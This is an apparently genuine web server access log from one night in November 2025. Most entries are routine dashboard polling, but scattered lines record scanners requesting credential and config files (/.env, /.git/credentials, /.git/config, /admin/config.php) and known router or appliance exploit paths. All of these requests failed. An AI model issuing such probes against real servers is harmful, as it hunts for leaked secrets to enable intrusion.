3.146.107.169 - - [08/Nov/2025:01:08:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:01:14:14 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:01:14:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:23:50 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:23:51 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
45.156.128.39 - - [08/Nov/2025:01:25:47 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.39 - - [08/Nov/2025:01:25:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
44.201.177.43 - - [08/Nov/2025:01:28:17 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:01:28:17 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.226.197.75 - - [08/Nov/2025:01:28:32 +0300] "GET / HTTP/1.1" 302 -
185.226.197.75 - - [08/Nov/2025:01:28:32 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
185.226.197.74 - - [08/Nov/2025:01:28:52 +0300] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 299
44.201.177.43 - - [08/Nov/2025:01:37:18 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:01:37:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:38:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:38:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.163.6.253 - - [08/Nov/2025:01:38:59 +0300] "GET / HTTP/1.0" 400 468
74.210.158.2 - - [08/Nov/2025:01:43:11 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
74.210.158.2 - - [08/Nov/2025:01:43:11 +0300] "POST / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
74.210.158.2 - - [08/Nov/2025:01:43:12 +0300] "GET /.env HTTP/1.1" 404 299
74.210.158.2 - - [08/Nov/2025:01:43:14 +0300] "POST / HTTP/1.1" 302 -
3.145.49.236 - - [08/Nov/2025:01:50:18 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:50:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:01:56:39 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:01:56:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [08/Nov/2025:01:56:45 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [08/Nov/2025:01:57:32 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:01:57:32 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:08:22 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:08:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:16:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:16:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:02:20:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:02:20:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.78.183.19 - - [08/Nov/2025:02:23:09 +0300] "GET / HTTP/1.1" 302 - "-" "python-requests/2.32.5"
44.201.177.43 - - [08/Nov/2025:02:31:41 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:31:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
213.209.157.24 - - [08/Nov/2025:02:32:20 +0300] "GET /.git/credentials HTTP/1.1" 404 299
204.76.203.219 - - [08/Nov/2025:02:36:22 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.179 - - [08/Nov/2025:02:37:47 +0300] "GET / HTTP/1.1" 302 -
167.94.138.179 - - [08/Nov/2025:02:38:06 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
167.94.138.179 - - [08/Nov/2025:02:38:12 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
167.94.138.179 - - [08/Nov/2025:02:38:44 +0300] "GET / HTTP/1.1" 302 -
167.94.138.179 - - [08/Nov/2025:02:39:06 +0300] "GET /wiki HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:02:39:43 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:02:39:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:40:42 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:02:40:43 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:02:50:18 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:02:50:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:02:56:33 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [08/Nov/2025:03:08:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:03:08:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:03:11:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:03:11:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:03:11:31 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:03:11:32 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:03:20:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:03:20:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:03:21:14 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.146.107.169 - - [08/Nov/2025:03:25:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:03:25:01 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:03:28:53 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
196.251.87.200 - - [08/Nov/2025:03:33:27 +0300] "GET /.git/credentials HTTP/1.1" 404 299
3.146.107.169 - - [08/Nov/2025:03:34:08 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:03:34:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:03:40:40 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:03:40:40 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
159.65.164.238 - - [08/Nov/2025:03:44:36 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [08/Nov/2025:03:44:43 +0300] "GET /.git/config HTTP/1.1" 404 299
44.201.177.43 - - [08/Nov/2025:03:49:38 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:03:49:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
159.65.164.238 - - [08/Nov/2025:03:58:58 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [08/Nov/2025:03:59:02 +0300] "GET /.git/config HTTP/1.1" 404 299
20.64.104.11 - - [08/Nov/2025:04:04:48 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 zgrab/0.x"
85.215.123.196 - - [08/Nov/2025:04:09:20 +0300] "GET /admin/config.php HTTP/1.0" 404 294
44.201.177.43 - - [08/Nov/2025:04:10:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:04:10:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
93.174.93.12 - - [08/Nov/2025:04:11:57 +0300] "\x16\x03\x02\x01o\x01" 400 325 "-" "-"
3.145.49.236 - - [08/Nov/2025:04:12:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:12:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:04:12:56 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
82.202.180.163 - - [08/Nov/2025:04:21:40 +0300] "GET /admin/config.php HTTP/1.1" 404 299
3.146.107.169 - - [08/Nov/2025:04:23:07 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:04:23:07 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:04:24:43 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:04:24:43 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
213.209.157.254 - - [08/Nov/2025:04:28:58 +0300] "GET /.git/HEAD HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:04:29:25 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:29:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
82.202.180.163 - - [08/Nov/2025:04:30:02 +0300] "GET /robots.txt HTTP/1.1" 404 299
88.80.152.191 - - [08/Nov/2025:04:32:30 +0300] "GET / HTTP/1.0" 302 - "-" "-"
204.76.203.219 - - [08/Nov/2025:04:32:43 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.65.164.238 - - [08/Nov/2025:04:34:35 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [08/Nov/2025:04:34:46 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:04:39:09 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:39:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.105.208.136 - - [08/Nov/2025:04:39:54 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
3.145.49.236 - - [08/Nov/2025:04:46:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:46:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:52:23 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:04:52:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:04:52:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:04:52:45 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.18 - - [08/Nov/2025:04:52:50 +0300] "GET /bin/ HTTP/1.1" 404 298 "-" "-"
20.29.23.70 - - [08/Nov/2025:04:57:56 +0300] "GET /druid/index.html HTTP/1.1" 404 298 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.18 - - [08/Nov/2025:05:04:20 +0300] "GET /backup/ HTTP/1.1" 404 298 "-" "-"
44.201.177.43 - - [08/Nov/2025:05:05:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:05:05:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:12:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:12:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [08/Nov/2025:05:14:39 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.201.177.43 - - [08/Nov/2025:05:17:02 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:05:17:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:20:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:20:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:28:29 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:28:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
45.79.115.134 - - [08/Nov/2025:05:33:16 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 zgrab/0.x"
172.234.217.129 - - [08/Nov/2025:05:33:22 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.234.217.129 - - [08/Nov/2025:05:33:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
44.201.177.43 - - [08/Nov/2025:05:33:50 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:05:33:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
87.121.84.80 - - [08/Nov/2025:05:34:10 +0300] "GET / HTTP/1.0" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
193.142.147.209 - - [08/Nov/2025:05:43:09 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.146.107.169 - - [08/Nov/2025:05:44:39 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:05:44:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:46:43 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:05:46:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:05:46:50 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:05:46:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
172.236.228.229 - - [08/Nov/2025:05:52:17 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.236.228.229 - - [08/Nov/2025:05:52:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.142.147.209 - - [08/Nov/2025:06:00:37 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [08/Nov/2025:06:02:05 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:02:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:08:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:08:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:21:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:21:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:26:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:26:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [08/Nov/2025:06:34:41 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [08/Nov/2025:06:37:39 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:37:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:06:37:58 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:06:37:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:51:06 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:06:51:06 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:06:55:09 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:06:55:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:04:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:04:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
149.100.11.243 - - [08/Nov/2025:07:10:15 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
149.100.11.243 - - [08/Nov/2025:07:10:16 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
3.145.49.236 - - [08/Nov/2025:07:21:56 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:21:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
64.62.156.202 - - [08/Nov/2025:07:26:34 +0300] "\x16\x03\x01" 400 325 "-" "-"
44.201.177.43 - - [08/Nov/2025:07:28:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:07:28:52 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:29:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:29:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.153.79.218 - - [08/Nov/2025:07:36:16 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.79.218 - - [08/Nov/2025:07:36:16 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
159.65.225.55 - - [08/Nov/2025:07:36:37 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
159.65.225.55 - - [08/Nov/2025:07:36:37 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
3.145.49.236 - - [08/Nov/2025:07:36:39 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:36:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:38:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:38:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:07:47:22 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:07:47:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:51:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:07:51:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:53:03 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:07:53:03 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:08:01:06 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:08:01:07 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:08:02:01 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:08:04:16 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:08:04:17 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:08:09:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:08:09:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [08/Nov/2025:08:19:57 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [08/Nov/2025:08:24:42 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:08:24:42 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:08:36:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:08:36:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
94.74.182.142 - - [08/Nov/2025:08:42:02 +0300] "GET / HTTP/1.1" 302 - "-" "-"
3.145.49.236 - - [08/Nov/2025:08:42:09 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:08:42:09 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
93.174.93.12 - - [08/Nov/2025:08:48:01 +0300] "\x16\x03\x02\x01o\x01" 400 325 "-" "-"
204.76.203.219 - - [08/Nov/2025:08:48:48 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.201.177.43 - - [08/Nov/2025:08:52:15 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
